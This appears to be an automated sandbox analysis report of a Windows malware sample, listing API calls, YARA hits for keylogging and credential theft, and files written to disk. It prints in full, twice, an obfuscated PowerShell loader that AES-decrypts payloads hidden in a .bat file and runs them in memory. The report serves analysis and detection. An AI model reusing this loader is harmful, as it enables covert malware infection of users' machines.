NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ab9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02abf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cc1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cc2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cc3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:44 p.m.	process_identifier: 2748 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04cc4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr = 'C:\Users\test22\AppData\Local\Temp\Dtaqbmza.bat'; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO=[System.Security.Cryptography.Aes]::Create(); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.IV=[System.Convert]::FromBase64String('7AM2yoZ/54dcP3vKSzsqGA=='); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Key=[System.Convert]::FromBase64String('QWVElovYpX3jzYwnlNT8Uf/i1KixgzGrFxLrNjNQkUY='); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Mode=[System.Security.Cryptography.CipherMode]::CBC;function decrypt_function($param_var){ $tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY=$PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.CreateDecryptor(); $kwBLIWdZkAnbPLsOUifQJAEpBtAmkjvSJDKZefCW=$tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY.TransformFinalBlock($param_var, 0, $param_var.Length); $kwBLIWdZkAnbPLsOUifQJAEpBtAmkjvSJDKZefCW;}function execute_function($param_var,$param2_var){ $UrBOqNGxlRQhCPuWAZwTvDzVkryTmjAebiEZIMYH=[System.Reflection.Assembly]::Load([byte[]]$param_var); $cKWcvbfZZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi=$UrBOqNGxlRQhCPuWAZwTvDzVkryTmjAebiEZIMYH.EntryPoint; $cKWcvbfZZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr;$eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug = [type]::GetType('Syst'+'e'+'m'+'.I'+'O.F'+'i'+'l'+'e');$OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD = [type]::GetType('S'+'ys'+'t'+'e'+'m'+'.E'+'nv'+'i'+'ro'+'n'+'me'+'n'+'t');$myUaQQgClnhcjZtqzUKJVKOEYEJjImKufuMPRkkA = $eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug::ReadAllText($kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr);$FEjXnkEavAlLMQmBKpcmhXTZCMWOmDypKkdrBQqN = $OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD::NewLine;$ZINhbYHoilfChYtHKkvAnQNScVbCNVZTYomyjMXD = $myUaQQgClnhcjZtqzUKJVKOEYEJjImKufuMPRkkA.Split($FEjXnkEavAlLMQmBKpcmhXTZCMWOmDypKkdrBQqN);$mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAGqIRLd = $ZINhbYHoilfChYtHKkvAnQNScVbCNVZTYomyjMXD;foreach ($pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe in $mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAGqIRLd) { if ($pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.StartsWith(':: ')) { $rsZKYruhVLafpWQNRSCaMXzhWSNnJIatoDkiztmD=$pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.Substring(3); break; }}$payloads_var=[string[]]$rsZKYruhVLafpWQNRSCaMXzhWSNnJIatoDkiztmD.Split('\');$payload1_var= decrypt_function ([Convert]::FromBase64String($payloads_var[0]));$payload2_var= decrypt_function ([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW May 4, 2025, 12:44 p.m.	thread_identifier: 2752 thread_handle: 0x00000088 process_identifier: 2748 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr = 'C:\Users\test22\AppData\Local\Temp\Dtaqbmza.bat'; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO=[System.Security.Cryptography.Aes]::Create(); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.IV=[System.Convert]::FromBase64String('7AM2yoZ/54dcP3vKSzsqGA=='); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Key=[System.Convert]::FromBase64String('QWVElovYpX3jzYwnlNT8Uf/i1KixgzGrFxLrNjNQkUY='); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Mode=[System.Security.Cryptography.CipherMode]::CBC;function decrypt_function($param_var){ $tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY=$PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.CreateDecryptor(); $kwBLIWdZkAnbPLsOUifQJAEpBtAmkjvSJDKZefCW=$tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY.TransformFinalBlock($param_var, 0, $param_var.Length); $kwBLIWdZkAnbPLsOUifQJAEpBtAmkjvSJDKZefCW;}function execute_function($param_var,$param2_var){ $UrBOqNGxlRQhCPuWAZwTvDzVkryTmjAebiEZIMYH=[System.Reflection.Assembly]::Load([byte[]]$param_var); $cKWcvbfZZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi=$UrBOqNGxlRQhCPuWAZwTvDzVkryTmjAebiEZIMYH.EntryPoint; $cKWcvbfZZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr;$eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug = [type]::GetType('Syst'+'e'+'m'+'.I'+'O.F'+'i'+'l'+'e');$OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD = [type]::GetType('S'+'ys'+'t'+'e'+'m'+'.E'+'nv'+'i'+'ro'+'n'+'me'+'n'+'t');$myUaQQgClnhcjZtqzUKJVKOEYEJjImKufuMPRkkA = $eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug::ReadAllText($kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr);$FEjXnkEavAlLMQmBKpcmhXTZCMWOmDypKkdrBQqN = $OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD::NewLine;$ZINhbYHoilfChYtHKkvAnQNScVbCNVZTYomyjMXD = $myUaQQgClnhcjZtqzUKJVKOEYEJjImKufuMPRkkA.Split($FEjXnkEavAlLMQmBKpcmhXTZCMWOmDypKkdrBQqN);$mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAGqIRLd = $ZINhbYHoilfChYtHKkvAnQNScVbCNVZTYomyjMXD;foreach ($pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe in $mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAGqIRLd) { if ($pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.StartsWith(':: ')) { $rsZKYruhVLafpWQNRSCaMXzhWSNnJIatoDkiztmD=$pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.Substring(3); break; }}$payloads_var=[string[]]$rsZKYruhVLafpWQNRSCaMXzhWSNnJIatoDkiztmD.Split('\');$payload1_var= decrypt_function ([Convert]::FromBase64String($payloads_var[0]));$payload2_var= decrypt_function ([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); filepath_r: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 4, 2025, 12:44 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: 284fcfb6334103ef179aba9ec7fb18572b05451b
buffer	Buffer with sha1: a19b7b1dacf4823c62393de6bd9c999946ea1806

Creates a suspicious Powershell process (3 events)

option	-ep bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Dtaqbmza.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All